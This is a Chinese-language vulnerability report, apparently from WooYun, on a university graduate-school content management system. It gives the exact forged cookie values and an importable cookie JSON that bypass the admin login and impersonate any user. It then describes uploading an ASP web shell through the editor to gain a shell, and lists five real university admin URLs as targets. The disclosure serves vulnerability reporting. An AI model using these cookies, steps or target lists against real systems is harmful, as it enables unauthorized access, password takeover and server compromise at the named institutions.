某高校通用内容管理系统后台任意用户登录+getshell

### 简要描述： 本来我是发现了该系统后台注入和万能密码登录的问题的，搜索了下没找到相关内容，以为没人提交过。等我整理好了，又发现了 http://www.wooyun.org/bugs/wooyun-2010-055845。 挺郁闷的啊....既然这样，那咱就换种方法吧。条条大路通后台啊~ ### 详细说明： 南京南软科技为研究生院开发的管理系统 http://www.southsoft.com.cn/Case.asp?id=941 该系统登陆后每次cookie都是一样的，通过简单的伪造cookie就可以绕过后台登陆。 以http://gsnfu.njfu.edu.cn/web_admin/main.aspx为例 直接访问提示 “登录超时或非法登录” [<img src="https://images.seebug.org/upload/201411/231202047797efe30f3c13b50178c094940a490f.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/231202047797efe30f3c13b50178c094940a490f.png) 添加下列cookei： ``` admin_classids： admin_id： 1 admin_level：1 admin_name：admin Adminlogin：logined ``` 或者直接导入下列cookie： ``` [ { "domain": ".yjs.cdutcm.edu.cn", "expirationDate": 1448202000, "hostOnly": false, "httpOnly": false, "name": "admin_level", "path": "/", "secure": false, "session": false, "storeId": "0", "value": "1", "id": 1 }, { "domain": "yjs.cdutcm.edu.cn", "hostOnly": true, "httpOnly": false, "name": "admin_classids", "path": "/", "secure": false, "session": true, "storeId": "0", "value": "", "id": 2 }, { "domain": "yjs.cdutcm.edu.cn", "hostOnly": true, "httpOnly": false, "name": "admin_id", "path": "/", "secure": false, "session": true, "storeId": "0", "value": "1", "id": 3 }, { "domain": "yjs.cdutcm.edu.cn", "hostOnly": true, "httpOnly": false, "name": "admin_name", "path": "/", "secure": false, "session": true, "storeId": "0", "value": "admin", "id": 4 }, { "domain": "yjs.cdutcm.edu.cn", "hostOnly": true, "httpOnly": false, "name": "adminlogin", "path": "/", "secure": false, "session": true, "storeId": "0", "value": "logined", "id": 5 } ] ``` 把域名修改为相应的域名域名就行了。其实系统只判断了adminlogin的值是否为logined，修改admin_id，和admin_name就可以以相应的用户身份登陆了。 添加相应的cookie后，刷新页面。 [<img src="https://images.seebug.org/upload/201411/2312031874337ca80da0e0be51fae2f2edfaa5fe.png" alt="图片2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/2312031874337ca80da0e0be51fae2f2edfaa5fe.png) 成功以admin的身份登陆了。 可以重置任意用户密码 [<img src="https://images.seebug.org/upload/201411/23120339f706f7dd45738f4e98d3ff6b47b535e2.png" alt="图片3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/23120339f706f7dd45738f4e98d3ff6b47b535e2.png) 在上传图片的地方研究了半天怎么突破上传，后来发现在编辑器里有个上传可下载文件的地方，可以上传除aspx外任意类型的文件。 [<img src="https://images.seebug.org/upload/201411/2312035993f96b0a05c4d62572b6c9558a2472df.png" alt="图片4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/2312035993f96b0a05c4d62572b6c9558a2472df.png) 上传个asp一句话 [<img src="https://images.seebug.org/upload/201411/23120420af5aaa24fde050bd88c05893ad13c384.png" alt="图片5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/23120420af5aaa24fde050bd88c05893ad13c384.png) 成功getshell [<img src="https://images.seebug.org/upload/201411/2312043947c65e10afbde5b69a5fd4543af9455d.png" alt="图片6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/2312043947c65e10afbde5b69a5fd4543af9455d.png) ### 漏洞证明： 提供几个测试案例： ``` http://gsnfu.njfu.edu.cn/web_admin/main.aspx http://gschool.hebmu.edu.cn/web_admin/main.aspx http://yjs.cdutcm.edu.cn/web_admin/main.aspx http://graduate.ynnu.edu.cn/web_admin/main.aspx http://gra.njutcm.edu.cn/web_admin/main.aspx ``` 伪造cookie后访问以上页面即可。